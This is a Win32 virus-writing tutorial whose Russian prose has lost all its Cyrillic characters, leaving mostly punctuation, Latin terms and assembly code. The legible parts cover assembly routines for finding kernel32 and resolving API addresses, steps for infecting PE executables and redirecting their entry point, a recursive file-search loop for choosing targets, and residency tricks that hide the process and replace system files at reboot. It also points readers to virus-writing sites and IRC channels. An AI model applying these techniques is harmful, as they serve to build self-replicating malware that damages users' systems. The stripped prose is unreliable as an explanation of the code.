
                                Win32
                              ================

                                 1.03

      ,      
   DOS,          
  .

  [1]  
  [2]   ?
  [3]   
  [4] 
  [5]    win32 -- 
  [6] PE-
  [7]   
  [8]   
  [9]  PE-
  [10]  
  [11]  (ring-3)

  [1]  
  ~~~~~~~~~~~~~~~~~~~

  ,      win32,    .

    ,  ,      
  ,     /  C/C++.

  H,  --  ,  ,   C++ 
  -     --   ,
        - --   -  .

          ,
      .

  ,     32-  --
  ,   EAX'  AX'.
     16-   32- -- H ,
            win32.

  H ,      ,
    :

        - Windows 95/98/NT/2000 ( Win98)
        - 32-  TASM 5.0
             :
              tasm32.exe, tlink32.exe, import32.lib, *.inc

        -  Soft-ICE  Windows ( Soft-Ice 4.00)
               , ,   , 
            1.   / 
            2.   
            3.  
        -      
            H ,     
              - .
               Dos Navigator,   Far+MultiEdit.
        - ,   
            HIEW
            IDA Pro
        - _H_ (  ):
            TurboDebugger, Norton/Volkov Commander, HyperTerminal, etc.

   ,   , :

        - WIN32.HLP --  ;
              12 MB,    Borland C++,
                ,    SDK
            :
                 C-,
               PUSH-  H .
             2:
                  
             Borland Delphi.

        - DDPR.HLP --   win9X ring-0/VxD
              DDK

        -    SDK  DDK
               ,    ,
                

        -       "  PE" by Hardwisdom,
              .

  [2]   ?
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    ~~~~~
             Win32  
     ,        
  :
         "    Windows95"
         "H Windows 95" (2-e )

     
     ~~~~
      http://protools.cjb.net

     
     ~~~~~~~~
      :

     http://z0mbie.host.sk -  Z0MBiE,   
     http://topd.tsx.org - -  Top Device, ,  
                             .
     http://smf.chat.ru -   SMF
     http://myallstar.cjb.net -   Misdirected Youth
     http://vx.netlux.org -   , , .

     :

     http://www.coderz.net -   
     http://virus.cyberspace.sk -   Asterix'a.

     IRC:
     ~~~~
     Undernet:

       #virus - ,       
       #smf   - 

        EFnet:

       #sgww  - 

      ,         ,
             
       .   :)

  [3]   
  ~~~~~~~~~~~~~~~~~~~~~~~~~~

    ,     
    ,    .

  :
  1.  -   win32-  
        in-the-wild  ( )
  2. ,   
  3.    
  4.      ( )
  5.     

  H  ,    ,
          .

   -    ,      
    ,   -  .

         :

  1.     --   
  2.     (   )
     --   ;    --
             .EXE
        (/   PE00)  - ,
              -
  3.     --   
     --   :
            1.     
            2.       MBR', ,
                  MBR'    ,
                 "" MBR'   "" 
            3. H     MBR'  
            4.   ""     
                 MBR', , -,
                    
            5.       
                   
            6. H .BAT-,  () 
                     
               ( , ,  ..)
            7.  ,    , 
                MBR
     --      :
            1.  BAT    5      
                
            2.   ""    
            3.  ,  "" MBR  
            4. 
            5. /   "" 
            6.   MBR  ( )
            7.   "" 
     --        
           5-10 ;    .
        ,      "" ,  
               ;
             "" .
  4.        --
     --        ,  
          ,          
           (  , )


  [4] 
  ~~~~~~~~~~~~~

   ,   --  Soft-Ice.

    Soft-Ice      ,
            
  ,    .     
    ,   -  .
  ( Trident 8900,      Standart Trident SVGA,
       Trident 9440).
       ,    ,
     100%   VESA,    
   Soft-Ice     ,    .

      ,       
      Soft-Ice  .   5103-00009B-9B
        Soft-Ice 4.03-4.05

     ,  Soft-Ice     
   ,      .

        Soft-Ice  ,
            3- ,
      winice.dat   INIT=  i3here on;
          int 3 
    Soft-Ice,      .

          ,     DEBUG.EXE,
      .
   H      .

            h ( help),
      ?  DEBUG.EXE  --   .


  [5]    win32 -- 
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     ,   ;
       ,       .
     -  (386,486,586),
       .   .

  , win32 --  ,      
  ().        32-
  __.

  32- ,      2^32 ,  4 .
    __   
   4-   () ,
  ""    ""  ( 4- ),
   0  0xFFFFF000.
   ,   " " -- "" ( ),
   /  .

  .,                    ,
    16 MB             4 

  4k> 4k  , (== . )
                          
  4k                ::::::  
                       > 4k
  4k                         , (== )
                         ::::::
  ::::::                       ::::::   (== )
                    ::::::
  (),  MB             4k  ,     
  4k  
                          ::::::
  ::::::                        ::::::

   4-   4-   
  H (allocate),      
     ,     .
     H (free, deallocate),    
   ,    "",  
   H   .
      H (commit, lock),   
  "", ..  -    .
      H (decommit, unlock),
      ,      
       (swap-file).

         ,  
     .
       (swapping) 
  , "",       ,
         --     .

  ,     () -- 
  __  ,
      ,
    __  .

        
  ( __),
           H.
   ,       .
       /  ,
  ,  (heap), /  , 
    (DLL)   .

      ,     - .
   --     4k.   --  ,
   __.

    ,    
           .

      :

  
  0x00000000   -- DOS V86-,
              win9X   /.
  0x00200000   --  ,     .
  0x00400000 2044   ,    
                DLL-, , ,    .
  0x80000000 2  --  ,   ,
              win9X --   VxD-  kernel

    .

    ,       
   .
   win32    : ring-3 ()  ring-0 ().
  H  ring-0       
   --   ()      .
     ring-3   :
  1.      (read-write)
  2.     (read-only)
  3.  (       )
  4.     (executable),
       guard, writecopy      --
            .
       (0/3)      CS.

    ,        read-only,
        ,      .
        kernel'    PE-.
    PE-      ObjectEntry
       ,
    -  VirtualProtect/WriteProcessMemory;
    kernel'    
  ( )    .


  [6] PE-
  ~~~~~~~~~~~~

  PE (Portable Executable) --   ,
       win32 EXE  DLL .
         .

   ,  PE EXE/DLL      ,
   KERNEL32.DLL   .

  KERNEL32.DLL     ()  PE 
   ,      win32 api.

   PE   ()  KERNEL'   DLL- 
  ,      .

    KERNEL32.DLL        ( 2- ),
        .

     :
    PE     / 
  (      ),      :
  :  , MAZAFUK.EXE,   KERNEL32.DLL  DeleteFile.
  : , KERNEL32.DLL,   DeleteFile.

      MAZAFUK.EXE    
     KERNEL32.DLL     DLL-,
          
      MAZAFUCK.EXE .
     ,     CALL'
    .

     PE-EXE ,
     /   ,
     (tlink32.exe).
     :

  extern DeleteFileA:PROC        ;    
  call   DeleteFileA             ;   

  public  mazafuk                ;    
  mazafuk: ...

  ,        ,  
        
    ,     ;
          .


   PE-  . (    )

       :
  MZ-
  PE-
    (== )
   ( )

    --    ,    , ,
  ,   .

  H ,    , , dos'
  COM ,  PE         .
  ,    dos' EXE-,   
     .
    ,         ,
      ,  
  _______ (RVA)
   
  _______.
          .

  ,   PE ,     
    (rva),    .
         
    .

   PE-   ImageBase.
     64k (   ),  ,   
         .
  MZ-, PE-       
  ,   .
   -- .     ,
         ,
      .
            ,
       
      "" ,
    ,       
      : DB 1000 dup (?)

    ,    PE    
      ,    .


  [7]   
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ,     H   .
   :  ,     
  (   )    KERNEL32.DLL,
         .

      :
  1.    KERNEL32.DLL, 
  2.    

   kernel'    (win9x)  BFF70000.
   winNT   , ,  ,
       .
      ,      
     NT'.

      PE    ,  
      .    
  KERNEL32.DLL,        
   kernel'.
    ,    ,     
  .  , winNT.
  ,       
   -   DLL-,     64k  
    MZ.      ,  kernel  .
    ,    ,     
  -  . (   ).
    -      
        kernel,    
        .
        :

  1.       GetModuleHandleA, 
     (.. )   .
      :
       ,          
     ,   "".
           GetProcAddress,     
                  
   . H  ,     , 
   ,  ,    GetModuleHandleA.

.386p
.model flat
extrn GetModuleHandleA:proc
.data
imagebase       dd 00400000h
Modulename      db 'KERNEL32.DLL',0
gmh             db 'GetModuleHandleA',0
.code
start:
       int 3                   ; 

       mov edx,[imagebase]

       mov  eax,[edx+3ch]
       add  eax,edx            ;EAX -  PE 

       mov ebx,[eax+80h]       ;EBX -     (RVA)
       add ebx,edx             ;  imagebase

next_module:

       mov ecx,[ebx+0ch]       ;      
                               ;    

       cmp 4 ptr ecx,0         ;     
       jz  no_kern_imp
       add ecx,edx

       cmp 4 ptr [ecx],'NREK'  ;       kernel32
                               ;(      )
       jne next
       cmp 4 ptr [ecx+4],'23LE'
       je kern_imp

next:
       add ebx,14h             ;  
       jmp next_module

kern_imp:

       mov eax,[ebx]           ;    
                               ;  kernel32
       add eax,edx
       xor ecx,ecx

api_imp:

       mov esi,[eax]
       cmp 4 ptr esi,0         ;  =    
       jz  no_kern_imp

       add esi,2               ;      
                               ;   -
       add esi,edx

       mov edi,offset gmh
       push ecx
       mov ecx,16
       repe cmpsb              ; GetModuleHandleA
       pop  ecx
       jz  f_gmh

       add ecx,4
       add eax,4
       jmp api_imp             ; 

f_gmh:
       mov eax,[ebx+10h]       ;    
       add eax,edx
       add eax,ecx             ;    
                               ; 
       mov eax,[eax]           ; 

       mov  ecx,offset Modulename
       push ecx
       call eax                ; GetModuleHandleA
                               ;RETRUN: EAX -  () kernel32.dll

no_kern_imp:

       nop
end start

   2.    -     
         ,   
   ,         .

.386p
.model flat
extrn GetModuleHandleA:proc
.data
imagebase       dd 00400000h
Modulename      db 'KERNEL32.DLL',0
gmh             db 'GetModuleHandleA',0
.code
start:
       int 3h                  ; 

       mov edx,[imagebase]

       mov  eax,[edx+3ch]
       add  eax,edx            ;EAX -  PE 

       mov ebx,[eax+80h]       ;EBX -     (RVA)
       add ebx,edx             ;  imagebase

next_module:

       mov ecx,[ebx+0ch]       ;      
                               ;    

       cmp 4 ptr ecx,0         ;     
       jz  no_kern_imp
       add ecx,edx

       cmp 4 ptr [ecx],'NREK'  ;       kernel32
                               ;(      )
       jne next
       cmp 4 ptr [ecx+4],'23LE'
       je kern_imp

next:
       add ebx,14h             ;  
       jmp next_module

kern_imp:

       mov eax,[ebx+10h]           ;    
                                  ;  kernel32
       add eax,edx

       mov eax,[eax]
       xor ax,ax
       ...

      PE-      ?

  
  1.   PE    64k,
  2.          
        
  3.      MZ-
     :

  1.      
  2.   64k
  3.    H  'MZ',     64k   3

   ...
f_kern32:

       cmp 2 ptr [edx],'ZM'
       je  check_pe
       cmp 2 ptr [edx],'MZ'
       jne next_seg

check_pe:

       cmp 1 ptr [edx+18h],40h        ; H  
       jne next_seg

       mov esi,[edx+3ch]
       add esi,edx

       cmp 4 ptr [esi],'EP'            ; H  
       jne next_seg
       jmp kern32

next_seg:

       sub edx,10000h
       jmp f_kern32

kern32:
no_kern_imp:

       nop

end start


    kernel' ?

      , ,  ,
    :

   1, :

    PE ,   ,   ,
  ,   kernel',       
    .

   2,  :

     :

; input:  EDI=  kernel' ( 'CreateProcessA')
; output: ZF=1, EAX=0 (function not found)
;         ZF=0, EAX=function va

get_proc_address:       pusha

                        mov     ebx, 0BFF70000h         ; get_kernel_base

                        mov     ecx, [ebx+3Ch]          ; mz_neptr
                        mov     ecx, [ecx+ebx+78h]      ; pe_exporttablerva
                        jecxz   __return_0
                        add     ecx, ebx

                        xor     esi, esi        ; current index
__search_cycle:         lea     edx, [esi*4+ebx]
                        add     edx, [ecx+20h]  ; ex_namepointersrva
                        mov     edx, [edx]      ; name va
                        add     edx, ebx        ; +imagebase

                        push    edi             ; compare names
__cmp_cycle:            mov     al, [edx]
                        cmp     al, [edi]
                        jne     __cmp_done
                        or      al, al
                        jz      __cmp_done
                        inc     edi
                        inc     edx
                        jmp     __cmp_cycle
__cmp_done:             pop     edi

                        je      __name_found

                        inc     esi             ; index++
                        cmp     esi, [ecx+18h]  ; ex_numofnamepointers
                        jb      __search_cycle

__return_0:             xor     eax, eax        ; return 0
                        jmp     __return

__name_found:           mov     edx, [ecx+24h]  ; ex_ordinaltablerva
                        add     edx, ebx        ; +imagebase
                        movzx   edx, word ptr [edx+esi*2]; edx=current ordinal
                        mov     eax, [ecx+1Ch]  ; ex_addresstablerva
                        add     eax, ebx        ; +imagebase
                        mov     eax, [eax+edx*4]; eax=current address
                        add     eax, ebx        ; +imagebase

__return:               mov     [esp+7*4], eax  ; popa.eax

                        popa
                        retn

     :

  1.      ,  --   kernel 
    --  kernel   dll',   ;
         .
   ' ' , ,    
      EXTERN,       RET'.
  ( ,     DLL-)

  2.  ,     ,   
       (   ),
     -A   -W.
   -A (ascii) ,    ASCII ,
       ,     0.
   -W (wide) ,     ,
       ,     ,
         .
    (-A/-W) ,     ,   
    ;  ,     ,  
        .
  ,      -Ex,     Ex, ExA  ExW.
   ,  -Ex     .
         ( Ex)
  ,   (EXtended)  ,   
     .  ,  ""  
     -Ex - .
   ,    .
     ,      
   CreateFile,        kernel' H.
       : CreateFileA  CreateFileW.
      C- ,   , 
      ,   A  W .

  ,      
  ____  - ,
   (  kernel32.dll)   
     .

  [8]   
  ~~~~~~~~~~~~~~~~~~~~

  H    ,   
     .
  (,  ,  , /, )
    ,   .

     ?
  H   ,     . H ,   ,
    ,    PUSH-   .
         :

  ; action: open file for read-write access
  ; input:  EDX=file name
  ; output: CF=0 -- EAX=handle
  ;         CF=1 -- error

  fopen_rw:             pusha
                        push    0
                        push    FILE_ATTRIBUTE_NORMAL
                        push    OPEN_EXISTING
                        push    0
                        push    FILE_SHARE_READ + FILE_SHARE_WRITE
                        push    GENERIC_READ + GENERIC_WRITE
                        push    edx
                        call    CreateFileA
                        cmp     eax, -1
                        je      error
                        clc
                        mov     [esp+7*4], eax          ; popa.eax
                        popa
                        retn
error:                  stc
                        popa
                        retn

           maplib4.zip

    . H       .
          , PUSH-
   ,         30.
           
    .
   ,   "" (..  )
    lopen, lread  ..

      :

  push    0
  push    80h     ; FILE_ATTRIBUTE_NORMAL
  push    3       ; 3=OPEN_EXISTING  2=CREATE_ALWAYS
  push    0
  push    1+2     ; 1=FILE_SHARE_READ 2=FILE_SHARE_WRITE
  push    080000000h+40000000h ; GENERIC_READ + GENERIC_WRITE
  push    offset FileName
  call    CreateFileA
  cmp     eax, -1
  je      __failed
  xchg    ebx, eax

  push    0
  push    ebx                     ; handle
  call    GetFileSize
  mov     bufsize, eax

  push    eax                     ; size
  push    0                       ; 0=GMEM_FIXED
  call    GlobalAlloc
  mov     bufptr, eax

  push    0
  push    offset bytesread        ; bytesread
  push    bufsize                 ; size
  push    bufptr                  ; buf
  push    ebx                     ; handle
  call    ReadFile

  push    ebx                     ; handle
  call    CloseHandle

  [9]  PE-
  ~~~~~~~~~~~~~~~~~~~~~~~

   ,        
    ,     - .
      INT 3,    
     .

  H      PE  
      .
    :

  *       :
         ,    ;
         -   
  *      ;
  *      ;
     
     ____  __;
       VirusEntryPoint-VirusStart    
     RVA   ( PE-)
  *  ____   
  *       
    FileAlignment  ObjectAlignment,   PE-
  *     --     
  *     --     
  *  SizeOfImage  PE- --  
    ____ +
    ___

    .
    ,     ,
      ,  DLL-        ,
       --  .
      ,     imagebase --  .

  H     
  1.   
  2.  
   :
  3.     
  4.     
  5.       

         DLL-;
    imagebase     () .

        
   JMP ( 0xE9).
   ,    PUSH <address>/RETN,  ,
  ..       imagebase.

     ,     DLL'.
         :

  mov eax, 1
  retn 0Ch

       ,    ,
     mov eax,1    .

  [10]  
  ~~~~~~~~~~~~~~~~~

        .
   ,    .
     FindFirstFileA / FindNextFileA / FindClose.
           
   ,   win32- .

           :

ff_struc                struc                   ; win32 "searchrec" structure
ff_attr                 dd      ?
ff_time_create          dd      ?,?
ff_time_lastaccess      dd      ?,?
ff_time_lastwrite       dd      ?,?
ff_size_hi              dd      ?
ff_size                 dd      ?
                        dd      ?,?
ff_fullname             db      260 dup (?)
ff_shortname            db      14 dup (?)
                        ends

; subroutine: process_directory
; action:     1. find all files in the current directory
;             2. for each found directory (except "."/"..") recursive call;
;                for each found file call process_file
; input:      EDI=ff_struc
;             EDX=directory name
; output:     none

process_directory:      pusha
                        sub     esp, 1024       ;    

                        mov     esi, edx        ;  EDX  
                        mov     edi, esp        ;    

__1:                    lodsb                   ;     
                        stosb
                        or      al, al
                        jnz     __1

                        dec     edi             ;     '\'
                        mov     al, '\'
                        cmp     [edi-1], al
                        je      __3
                        stosb
__3:
                        mov     ebx, edi        ; EBX =   

                        mov     eax, '*.*'      ; : \*.*
                        stosd

                        mov     edi, [esp+1024] ;  EDI (pusha.edi)

                        mov     eax, esp
                        push    edi             ; ff_struc,  
                        push    eax             ;   
                        call    FindFirstFileA

                        xchg    esi, eax        ; ESI =  

                        cmp     esi, -1         ; - ?
                        je      __quit

__cycle:                pusha                   ;     
                        lea     esi, [edi].ff_fullname
                        mov     edi, ebx
__strcpy:               lodsb
                        stosb
                        or      al, al
                        jnz     __strcpy
                        popa

                        mov     edx, esp        ; EDX =   

                        test    byte ptr [edi].ff_attr, 16  ; ?
                        jnz     __dir

                        call    process_file    ;   (EDX,EDI)

                        jmp     __next

__dir:                  lea     eax, [edi].ff_fullname
                        cmp     byte ptr [eax], '.'    ; skip ./../etc.
                        je      __next

                        call    process_directory       ;  

__next:                 push    edi             ; ff_struc,  
                        push    esi             ;  
                        call    FindNextFileA

                        or      eax, eax        ;  ?
                        jnz     __cycle

                        push    esi             ; ESI =  
                        call    FindClose

__quit:                 add     esp, 1024
                        popa
                        retn

; input: EDX=full filename
;        EDI=ff_struc

process_file:           pusha

;                       ...

                        popa
                        retn


  [11]  (ring-3)
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~

  ,    DOS' TSR-,  win32 .
     ,   .
      ,    ,   ,
  ,      .

  H     "":
        (GetWindowsDirectoryA, CopyFileA)
    DROPPER.EXE,       
     .

     ,  :   
   -    .
      ,
       .

        ctrl-alt-del?
     ;
   winNT    RegisterServiceProcess ,
   ,     .

                        push    1
                        push    0
                        call    RegisterServiceProcess

    //   
  Process32First/Next, Module32First/Next, Thread32First/Next.
        ,     .

  ,     ,    win32 
  /  ,  ,  .
       ,  win9X   winNT.
     %windir\wininit.ini  2 :
  [rename]
  dstfile=srcfile
      ,   ,    
      ,    .
        
  WritePrivateProfileStringA.
    ring-0     .
   winNT   - MoveFileExA  
  DELAY_UNTIL_REBOOT,          
  .
  ,  , MoveFileExA   ,   
    ,   ,    winNT 4   win2000 
   explorer.exe   .
  ,  NT 3/4       ,
      ;   win2000    SFC.
       SETUPAPI.DLL::SetupInstallFileA,  
  __  movefileex'.

  H.
  H (thread) --  ,     
  .    --   .
      ()    
    ( )        .
       ,     .
          -- .
    ,    ,  CreateThread.
       CreateThread    
       .


                                   * * *
